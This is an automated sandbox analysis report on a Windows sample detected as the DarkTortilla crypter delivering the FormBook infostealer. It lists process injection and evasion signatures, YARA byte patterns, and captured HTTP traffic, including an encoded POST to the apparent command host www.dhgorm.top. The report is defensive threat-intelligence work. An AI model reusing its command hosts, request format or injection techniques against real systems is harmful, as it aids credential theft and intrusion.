Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rFV23+17555.exe

Overview

General Information

Sample name:rFV23+17555.exe
Analysis ID:1428881
MD5:265a61c55a5139ac2ff0d9c53a64e1b1
SHA1:edcc6a5534fbf0caa31a0e18d3c9f6b4e114465c
SHA256:67611434a84b916587bc6a7f815cbe39f72c6403d304b1f1274d91e089e6527e
Tags:exeMassLogger
Infos:

Detection

DarkTortilla, FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
Yara detected FormBook
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • rFV23+17555.exe (PID: 516 cmdline: "C:\Users\user\Desktop\rFV23+17555.exe" MD5: 265A61C55A5139AC2FF0D9C53A64E1B1)
    • AddInProcess32.exe (PID: 4856 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
      • gxDswOWWlPEzerVr.exe (PID: 4424 cmdline: "C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • PATHPING.EXE (PID: 1308 cmdline: "C:\Windows\SysWOW64\PATHPING.EXE" MD5: 078AD26F906EF2AC1661FCAC84084256)
          • gxDswOWWlPEzerVr.exe (PID: 4752 cmdline: "C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6772 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DarkTortillaDarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla
NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.3293807088.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.3293807088.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a3d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13a6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000004.00000002.2951814357.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.2951814357.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2da73:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x17112:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000004.00000002.2952528062.00000000019B0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 16 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.AddInProcess32.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          4.2.AddInProcess32.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2da73:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17112:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          0.2.rFV23+17555.exe.3aea230.0.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
            4.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              4.2.AddInProcess32.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
              • 0x2cc73:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
              • 0x16312:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
              Click to see the 3 entries

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: rFV23+17555.exeReversingLabs: Detection: 57%
              Yara detected FormBook
              Source: Yara matchFile source: 4.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000007.00000002.3293807088.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2951814357.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2952528062.00000000019B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3295294820.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3295074777.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3294293351.0000000002690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2955366160.0000000001DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3295299661.0000000002990000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Machine Learning detection for sample
              Source: rFV23+17555.exeJoe Sandbox ML: detected
              Source: rFV23+17555.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: rFV23+17555.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: AddInProcess32.pdb source: PATHPING.EXE, 00000007.00000002.3294360405.00000000026FE000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.3296262041.00000000031CC000.00000004.10000000.00040000.00000000.sdmp, gxDswOWWlPEzerVr.exe, 00000008.00000000.3018630470.00000000034AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3236521411.00000000297FC000.00000004.80000000.00040000.00000000.sdmp
              Source: Binary string: pathping.pdb source: AddInProcess32.exe, 00000004.00000002.2952201089.0000000001644000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2952201089.0000000001638000.00000004.00000020.00020000.00000000.sdmp, gxDswOWWlPEzerVr.exe, 00000006.00000002.3294736772.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gxDswOWWlPEzerVr.exe, 00000006.00000000.2876704128.0000000000A1E000.00000002.00000001.01000000.0000000B.sdmp, gxDswOWWlPEzerVr.exe, 00000008.00000000.3018047319.0000000000A1E000.00000002.00000001.01000000.0000000B.sdmp
              Source: Binary string: pathping.pdbGCTL source: AddInProcess32.exe, 00000004.00000002.2952201089.0000000001644000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2952201089.0000000001638000.00000004.00000020.00020000.00000000.sdmp, gxDswOWWlPEzerVr.exe, 00000006.00000002.3294736772.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2954385045.00000000029F6000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.3295610682.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.3295610682.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2951842653.00000000027F0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: AddInProcess32.exe, AddInProcess32.exe, 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, PATHPING.EXE, 00000007.00000003.2954385045.00000000029F6000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.3295610682.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.3295610682.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2951842653.00000000027F0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: AddInProcess32.pdbpw source: PATHPING.EXE, 00000007.00000002.3294360405.00000000026FE000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.3296262041.00000000031CC000.00000004.10000000.00040000.00000000.sdmp, gxDswOWWlPEzerVr.exe, 00000008.00000000.3018630470.00000000034AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3236521411.00000000297FC000.00000004.80000000.00040000.00000000.sdmp
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0041B790 FindFirstFileW,FindNextFileW,FindClose,7_2_0041B790
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 4x nop then xor eax, eax7_2_00409360
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 4x nop then pop edi7_2_00411CE6
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /s8hu/?UPVdm=spiDyH1b3uFUsTZxkISg08MBQMtSMA3+DyfgsgsxVWVMb+cPydsAHF754/iEUPAVeA5OBQjW9+XTnykROPWO/pmJGuCBnJv2R6Kqa3nD4OdTG3fimHjEv0IbRXA2Kbqi0w==&4tDdP=cl18T6Ap HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.66bm99.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
              Source: unknownDNS traffic detected: queries for: www.66bm99.shop
              Source: unknownHTTP traffic detected: POST /s8hu/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,enHost: www.dhgorm.topOrigin: http://www.dhgorm.topReferer: http://www.dhgorm.top/s8hu/Cache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 206User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like GeckoData Raw: 55 50 56 64 6d 3d 68 6c 4d 73 61 61 61 33 42 41 6b 50 55 4e 4f 41 34 30 6e 2b 38 6d 75 2f 63 65 52 65 36 6d 66 66 4f 76 73 4c 65 70 31 55 2f 6e 5a 72 56 4c 50 41 46 73 64 75 5a 54 74 6a 4c 35 5a 65 34 78 6d 63 4b 38 46 6c 41 71 51 53 45 5a 39 6c 56 52 63 4b 2b 77 34 77 46 46 42 70 47 70 6d 6f 75 55 7a 77 69 7a 45 65 43 72 32 79 61 53 2f 6b 4f 56 37 38 4c 75 46 49 49 76 75 6a 59 58 36 6c 58 77 41 6e 4d 54 39 64 61 61 55 72 59 47 58 54 4e 4f 66 39 55 69 62 46 4c 72 35 6b 48 73 4d 45 47 68 61 67 68 56 76 78 76 2b 35 52 50 70 36 61 6f 73 57 63 48 67 78 6b 4e 71 75 70 76 6b 62 73 78 46 75 61 63 6b 32 6b 4c 66 73 3d Data Ascii: UPVdm=hlMsaaa3BAkPUNOA40n+8mu/ceRe6mffOvsLep1U/nZrVLPAFsduZTtjL5Ze4xmcK8FlAqQSEZ9lVRcK+w4wFFBpGpmouUzwizEeCr2yaS/kOV78LuFIIvujYX6lXwAnMT9daaUrYGXTNOf9UibFLr5kHsMEGhaghVvxv+5RPp6aosWcHgxkNqupvkbsxFuack2kLfs=
              Source: gxDswOWWlPEzerVr.exe, 00000008.00000002.3295074777.0000000002EC0000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dhgorm.top
              Source: gxDswOWWlPEzerVr.exe, 00000008.00000002.3295074777.0000000002EC0000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dhgorm.top/s8hu/
              Source: PATHPING.EXE, 00000007.00000003.3132762724.000000000738D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: PATHPING.EXE, 00000007.00000003.3132762724.000000000738D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: PATHPING.EXE, 00000007.00000003.3132762724.000000000738D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: PATHPING.EXE, 00000007.00000003.3132762724.000000000738D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: PATHPING.EXE, 00000007.00000003.3132762724.000000000738D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: PATHPING.EXE, 00000007.00000003.3132762724.000000000738D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: PATHPING.EXE, 00000007.00000003.3132762724.000000000738D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: PATHPING.EXE, 00000007.00000002.3294360405.0000000002719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: PATHPING.EXE, 00000007.00000002.3294360405.0000000002719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
              Source: PATHPING.EXE, 00000007.00000002.3294360405.0000000002719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: PATHPING.EXE, 00000007.00000002.3294360405.0000000002719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033$
              Source: PATHPING.EXE, 00000007.00000002.3294360405.0000000002719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: PATHPING.EXE, 00000007.00000002.3294360405.000000000274A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
              Source: PATHPING.EXE, 00000007.00000003.3129497006.000000000736C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
              Source: PATHPING.EXE, 00000007.00000003.3132762724.000000000738D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: PATHPING.EXE, 00000007.00000003.3132762724.000000000738D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

              E-Banking Fraud

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 4.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000007.00000002.3293807088.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2951814357.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2952528062.00000000019B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3295294820.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3295074777.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3294293351.0000000002690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2955366160.0000000001DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3295299661.0000000002990000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 4.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000007.00000002.3293807088.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000004.00000002.2951814357.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000004.00000002.2952528062.00000000019B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000007.00000002.3295294820.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000008.00000002.3295074777.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000007.00000002.3294293351.0000000002690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000004.00000002.2955366160.0000000001DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000006.00000002.3295299661.0000000002990000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_0042AF73 NtClose,4_2_0042AF73
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B02B60 NtClose,LdrInitializeThunk,4_2_01B02B60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B02DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_01B02DF0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B02C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_01B02C70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B035C0 NtCreateMutant,LdrInitializeThunk,4_2_01B035C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B04340 NtSetContextThread,4_2_01B04340
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B04650 NtSuspendThread,4_2_01B04650
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B02BA0 NtEnumerateValueKey,4_2_01B02BA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B02B80 NtQueryInformationFile,4_2_01B02B80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B02BF0 NtAllocateVirtualMemory,4_2_01B02BF0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B02BE0 NtQueryValueKey,4_2_01B02BE0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B02AB0 NtWaitForSingleObject,4_2_01B02AB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B02AF0 NtWriteFile,4_2_01B02AF0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B02AD0 NtReadFile,4_2_01B02AD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B02DB0 NtEnumerateKey,4_2_01B02DB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B02DD0 NtDelayExecution,4_2_01B02DD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B02D30 NtUnmapViewOfSection,4_2_01B02D30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B02D10 NtMapViewOfSection,4_2_01B02D10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B02D00 NtSetInformationFile,4_2_01B02D00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B02CA0 NtQueryInformationToken,4_2_01B02CA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B02CF0 NtOpenProcess,4_2_01B02CF0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B02CC0 NtQueryVirtualMemory,4_2_01B02CC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B02C00 NtQueryInformationProcess,4_2_01B02C00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B02C60 NtCreateKey,4_2_01B02C60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B02FB0 NtResumeThread,4_2_01B02FB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B02FA0 NtQuerySection,4_2_01B02FA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B02F90 NtProtectVirtualMemory,4_2_01B02F90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B02FE0 NtCreateFile,4_2_01B02FE0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B02F30 NtCreateSection,4_2_01B02F30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B02F60 NtCreateProcessEx,4_2_01B02F60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B02EA0 NtAdjustPrivilegesToken,4_2_01B02EA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B02E80 NtReadVirtualMemory,4_2_01B02E80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B02EE0 NtQueueApcThread,4_2_01B02EE0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B02E30 NtWriteVirtualMemory,4_2_01B02E30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B03090 NtSetValueKey,4_2_01B03090
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B03010 NtOpenDirectoryObject,4_2_01B03010
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B039B0 NtGetContextThread,4_2_01B039B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B03D10 NtOpenProcessToken,4_2_01B03D10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B03D70 NtOpenThread,4_2_01B03D70
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C14340 NtSetContextThread,LdrInitializeThunk,7_2_02C14340
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C14650 NtSuspendThread,LdrInitializeThunk,7_2_02C14650
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C12AD0 NtReadFile,LdrInitializeThunk,7_2_02C12AD0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C12AF0 NtWriteFile,LdrInitializeThunk,7_2_02C12AF0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C12BE0 NtQueryValueKey,LdrInitializeThunk,7_2_02C12BE0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C12BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_02C12BF0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C12BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_02C12BA0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C12B60 NtClose,LdrInitializeThunk,7_2_02C12B60
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C12EE0 NtQueueApcThread,LdrInitializeThunk,7_2_02C12EE0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C12E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_02C12E80
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C12FE0 NtCreateFile,LdrInitializeThunk,7_2_02C12FE0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C12FB0 NtResumeThread,LdrInitializeThunk,7_2_02C12FB0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C12F30 NtCreateSection,LdrInitializeThunk,7_2_02C12F30
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C12CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_02C12CA0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C12C60 NtCreateKey,LdrInitializeThunk,7_2_02C12C60
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C12C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_02C12C70
